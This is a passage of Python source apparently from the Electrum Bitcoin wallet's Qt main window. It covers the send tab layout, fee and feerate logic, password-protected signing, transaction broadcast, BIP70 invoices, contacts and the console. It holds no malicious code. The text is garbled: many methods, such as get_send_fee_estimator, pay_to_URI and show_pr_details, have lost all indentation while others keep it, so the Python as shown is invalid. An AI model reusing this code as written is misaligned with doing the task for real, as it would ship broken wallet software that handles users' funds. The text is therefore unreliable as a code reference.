          + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Autocomplete the pay-to field from the contact list.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # 'From' list shows explicitly selected coins (coin control); hidden otherwise.
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
    self.from_list.setHeaderHidden(True)
    self.from_list.setMaximumHeight(80)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    # Freeze the fiat mirror whenever the coin amount becomes read-only.
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(140)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)
    def fee_cb(dyn, pos, fee_rate):
        # Slider callback: persist the chosen level/rate and refresh the UI.
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.is_max else self.update_fee()
    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(140)
    def on_fee_or_feerate(edit_changed, editing_finished):
        # Only one of fee / feerate may be user-frozen at a time.
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
            else:
                # edit_changed was edited just now, so make sure we will
                # freeze the correct fee setting (this)
                edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()
    class TxSizeLabel(QLabel):
        # Read-only label showing the estimated tx size between the fields.
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')
    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(140)
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
    def feerounding_onclick():
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.'))
        QMessageBox.information(self, 'Fee rounding', text)
    self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
    self.feerounding_icon.setFixedWidth(20)
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    # Advanced fee controls are only shown when 'show_fee' is enabled.
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)
    def reset_max(text):
        # Any manual amount edit cancels 'send max' mode.
        self.is_max = False
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    def entry_changed():
        # Recolor the amount/fee fields and update the status bar message.
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _( "Not enough funds" )
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Enter 'send max' mode and recompute the sendable amount/fee."""
    # Plugins may veto the send (e.g. while a hardware wallet is busy).
    if run_hook('abort_send', self):
        return
    self.is_max = True
    self.do_update_fee()
def update_fee(self):
    # Defer the (expensive) fee recomputation to the next timer tick.
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the entered recipient, or a dummy address output for fee sizing."""
    return self.payto_e.get_recipient() or (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    amount = '!' if self.is_max else self.amount_e.get_amount()
    if amount is None:
        # Nothing to send yet: clear fee and error state.
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
    else:
        fee_estimator = self.get_send_fee_estimator()
        outputs = self.payto_e.get_outputs(self.is_max)
        if not outputs:
            # Use a dummy output so the size/fee can still be estimated.
            _type, addr = self.get_payto_or_dummy()
            outputs = [TxOutput(_type, addr, amount)]
        is_sweep = bool(self.tx_external_keypairs)
        make_tx = lambda fee_est: \
            self.wallet.make_unsigned_transaction(
                self.get_coins(), outputs, self.config,
                fixed_fee=fee_est, is_sweep=is_sweep)
        try:
            tx = make_tx(fee_estimator)
            self.not_enough_funds = False
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            if not freeze_fee:
                self.fee_e.setAmount(None)
            if not freeze_feerate:
                self.feerate_e.setAmount(None)
            self.feerounding_icon.setVisible(False)
            if isinstance(e, NotEnoughFunds):
                self.not_enough_funds = True
            elif isinstance(e, NoDynamicFeeEstimates):
                # No fee estimate available: still show the estimated size.
                try:
                    tx = make_tx(0)
                    size = tx.estimated_size()
                    self.size_e.setAmount(size)
                except BaseException:
                    pass
            return
        except BaseException:
            traceback.print_exc(file=sys.stderr)
            return
        size = tx.estimated_size()
        self.size_e.setAmount(size)
        fee = tx.get_fee()
        fee = None if self.not_enough_funds else fee
        # Displayed fee/fee_rate values are set according to user input.
        # Due to rounding or dropping dust in CoinChooser,
        # actual fees often differ somewhat.
        if freeze_feerate or self.fee_slider.is_active():
            displayed_feerate = self.feerate_e.get_amount()
            if displayed_feerate is not None:
                displayed_feerate = quantize_feerate(displayed_feerate)
            else:
                # fallback to actual fee
                displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
                self.feerate_e.setAmount(displayed_feerate)
            displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
            self.fee_e.setAmount(displayed_fee)
        else:
            if freeze_fee:
                displayed_fee = self.fee_e.get_amount()
            else:
                # fallback to actual fee if nothing is frozen
                displayed_fee = fee
                self.fee_e.setAmount(displayed_fee)
            displayed_fee = displayed_fee if displayed_fee else 0
            displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        # show/hide fee rounding icon
        feerounding = (fee - displayed_fee) if fee else 0
        self.set_feerounding_text(int(feerounding))
        self.feerounding_icon.setToolTip(self.feerounding_text)
        self.feerounding_icon.setVisible(abs(feerounding) >= 1)
        if self.is_max:
            amount = tx.output_value()
            # Plugins (e.g. trustedcoin) may add their own extra fee.
            __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
            amount_after_all_fees = amount - x_fee_amount
            self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
    def protected(func):
        '''Password request wrapper. The password is passed to the function
        as the 'password' named argument. "None" indicates either an
        unencrypted wallet, or the user cancelled the password request.
        An empty input is passed as the empty string.'''
        def request_password(self, *args, **kwargs):
            parent = self.top_level_window()
            password = None
            # Re-prompt until a password passes check_password() or the
            # user cancels. Skipped entirely for unencrypted keystores.
            while self.wallet.has_keystore_encryption():
                password = self.password_dialog(parent=parent)
                if password is None:
                    # User cancelled password input
                    return
                try:
                    self.wallet.check_password(password)
                    break
                except Exception as e:
                    self.show_error(str(e), parent=parent)
                    continue
            kwargs['password'] = password
            return func(self, *args, **kwargs)
        return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
    def read_send_tab(self):
        """Validate the send tab and collect everything needed to build a tx.

        Returns (outputs, fee_estimator, label, coins) on success, or None
        when validation fails (an error dialog has already been shown).
        """
        if self.payment_request and self.payment_request.has_expired():
            self.show_error(_('Payment request has expired'))
            return
        label = self.message_e.text()
        if self.payment_request:
            # Outputs come from the BIP70 request, not the payto field.
            outputs = self.payment_request.get_outputs()
        else:
            errors = self.payto_e.get_errors()
            if errors:
                self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
                return
            outputs = self.payto_e.get_outputs(self.is_max)
            if self.payto_e.is_alias and self.payto_e.validated is False:
                # Alias resolved but its DNSSEC validation failed; let the
                # user decide whether to trust it anyway.
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "{}" could not be validated via an additional '
                        'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return
        if not outputs:
            self.show_error(_('No outputs'))
            return
        # Per-output sanity checks before attempting coin selection.
        for o in outputs:
            if o.address is None:
                self.show_error(_('Bitcoin Address is None'))
                return
            if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
                self.show_error(_('Invalid Bitcoin Address'))
                return
            if o.value is None:
                self.show_error(_('Invalid Amount'))
                return
        fee_estimator = self.get_send_fee_estimator()
        coins = self.get_coins()
        return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
    def do_send(self, preview = False):
        """Build, confirm, sign and (unless *preview*) broadcast a transaction.

        Reads the send tab, constructs an unsigned tx, runs sanity checks
        (relay fee, high-fee warning), asks the user for confirmation and a
        password when required, then hands off to sign_tx_with_password.
        """
        # Plugins may veto the send entirely.
        if run_hook('abort_send', self):
            return
        r = self.read_send_tab()
        if not r:
            return
        outputs, fee_estimator, tx_desc, coins = r
        try:
            is_sweep = bool(self.tx_external_keypairs)
            tx = self.wallet.make_unsigned_transaction(
                coins, outputs, self.config, fixed_fee=fee_estimator,
                is_sweep=is_sweep)
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            self.show_message(str(e))
            return
        except BaseException as e:
            traceback.print_exc(file=sys.stdout)
            self.show_message(str(e))
            return

        # Max-send spends everything minus fee; otherwise sum the outputs.
        amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
        fee = tx.get_fee()

        #use_rbf = self.config.get('use_rbf', True)
        #if use_rbf:
        #    tx.set_rbf(True)

        # Refuse fees below the server relay floor — such a tx would be dropped.
        if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
            self.show_error('\n'.join([
                _("This transaction requires a higher fee, or it will not be propagated by your current server"),
                _("Try to raise your transaction fee, or use a server with a lower relay fee.")
            ]))
            return

        if preview:
            self.show_transaction(tx, tx_desc)
            return

        if not self.network:
            self.show_error(_("You can't broadcast a transaction without a live network connection."))
            return

        # confirmation dialog
        msg = [
            _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
            _("Mining fee") + ": " + self.format_amount_and_units(fee),
        ]

        x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
        if x_fee:
            x_fee_address, x_fee_amount = x_fee
            msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )

        confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
        if fee > confirm_rate * tx.estimated_size() / 1000:
            msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))

        if self.wallet.has_keystore_encryption():
            # The password dialog doubles as the confirmation dialog here.
            msg.append("")
            msg.append(_("Enter your password to proceed"))
            password = self.password_dialog('\n'.join(msg))
            if not password:
                return
        else:
            msg.append(_('Proceed?'))
            password = None
            if not self.question('\n'.join(msg)):
                return

        def sign_done(success):
            # Incomplete (e.g. multisig/watch-partial) txs are shown instead
            # of broadcast so remaining signatures can be collected.
            if success:
                if not tx.is_complete():
                    self.show_transaction(tx)
                    self.do_clear()
                else:
                    self.broadcast_transaction(tx, tx_desc)
        self.sign_tx_with_password(tx, sign_done, password)
    @protected
    def sign_tx(self, tx, callback, password):
        """Sign *tx* after prompting for the wallet password (via @protected)."""
        self.sign_tx_with_password(tx, callback, password)
    def sign_tx_with_password(self, tx, callback, password):
        '''Sign the transaction in a separate thread. When done, calls
        the callback with a success code of True or False.
        '''
        def on_success(result):
            callback(True)
        def on_failure(exc_info):
            self.on_error(exc_info)
            callback(False)
        # A plugin (e.g. TrustedCoin) may wrap the success handler.
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        if self.tx_external_keypairs:
            # can sign directly
            task = partial(Transaction.sign, tx, self.tx_external_keypairs)
        else:
            task = partial(self.wallet.sign_transaction, tx, password)
        msg = _('Signing transaction...')
        # WaitingDialog runs the task off the GUI thread and shows progress.
        WaitingDialog(self, msg, task, on_success, on_failure)
    def broadcast_transaction(self, tx, tx_desc):
        """Broadcast *tx* on a worker thread, then report the result in the GUI.

        Also settles any pending payment request: marks the invoice paid and
        sends the BIP70 payment ACK with a refund address.
        """
        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Payment request has expired")
            try:
                self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
            except Exception as e:
                status, msg = False, repr(e)
            else:
                status, msg = True, tx.txid()
            if pr and status is True:
                self.invoices.set_paid(pr, tx.txid())
                self.invoices.save()
                self.payment_request = None
                refund_address = self.wallet.get_receiving_addresses()[0]
                ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
                if ack_status:
                    # prefer the requestor's acknowledgement text
                    msg = ack_msg
            return status, msg

        # Capture current TL window; override might be removed on return
        parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))

        def broadcast_done(result):
            # GUI thread
            if result:
                status, msg = result
                if status:
                    if tx_desc is not None and tx.is_complete():
                        self.wallet.set_label(tx.txid(), tx_desc)
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                    self.do_clear()
                else:
                    parent.show_error(msg)
        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
    def delete_invoice(self, key):
        """Remove invoice *key* from storage and refresh the invoice list."""
        self.invoices.remove(key)
        self.invoice_list.update()
    def payment_request_ok(self):
        """GUI-thread handler for a successfully verified payment request.

        Registers the invoice, short-circuits if it is already paid, and
        otherwise fills the send tab fields from the request.
        """
        pr = self.payment_request
        key = self.invoices.add(pr)
        status = self.invoices.get_status(key)
        self.invoice_list.update()
        if status == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Color the payto field by expiry status.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
    def payment_request_error(self):
        """GUI-thread handler for a failed payment request: report and reset."""
        self.show_message(self.payment_request.error)
        self.payment_request = None
        self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
    def do_clear(self):
        """Reset the send tab to its pristine state (fields, fees, coin selection)."""
        self.is_max = False
        self.not_enough_funds = False
        self.payment_request = None
        self.payto_e.is_pr = False
        for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
                  self.fee_e, self.feerate_e]:
            e.setText('')
            e.setFrozen(False)
        # Back to slider-driven fees at the configured default rate.
        self.fee_slider.activate()
        self.feerate_e.setAmount(self.config.fee_per_byte())
        self.size_e.setAmount(0)
        self.feerounding_icon.setVisible(False)
        self.set_pay_from([])
        self.tx_external_keypairs = {}
        self.update_status()
        run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
    def spend_coins(self, coins):
        """Start a send restricted to spending exactly the given coins."""
        self.set_pay_from(coins)
        self.show_send_tab()
        self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
    def do_pay_invoice(self, key):
        """Load invoice *key* into the send tab and re-run verification."""
        pr = self.invoices.get(key)
        self.payment_request = pr
        self.prepare_for_payment_request()
        pr.error = None  # this forces verify() to re-run
        if pr.verify(self.contacts):
            self.payment_request_ok()
        else:
            self.payment_request_error()
    def create_console_tab(self):
        """Build the Console tab widget and keep a reference on self.console."""
        from .console import Console
        self.console = console = Console()
        return console
    def update_console(self):
        """(Re)populate the console namespace with wallet/network objects and
        wrappers around every public wallet command."""
        console = self.console
        console.history = self.config.get("console-history",[])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
        })

        # Expose each Commands method by name; the wrapper routes execution
        # through c._run so password prompting works.
        c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            return lambda *args: f(method, args, self.password_dialog)
        for m in dir(c):
            # skip private attributes and names that would shadow the namespace
            if m[0]=='_' or m in ['network','wallet','config']: continue
            methods[m] = mkfunc(c._run, m)

        console.updateNamespace(methods)
    def create_status_bar(self):
        """Assemble the status bar: balance label, hidden search box, and the
        password / preferences / seed / network buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        qtVersion = qVersion()

        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)

        # Hidden until toggled via toggle_search().
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)

        # Icon is set later by update_lock_icon().
        self.lock_icon = QIcon()
        self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)

        sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
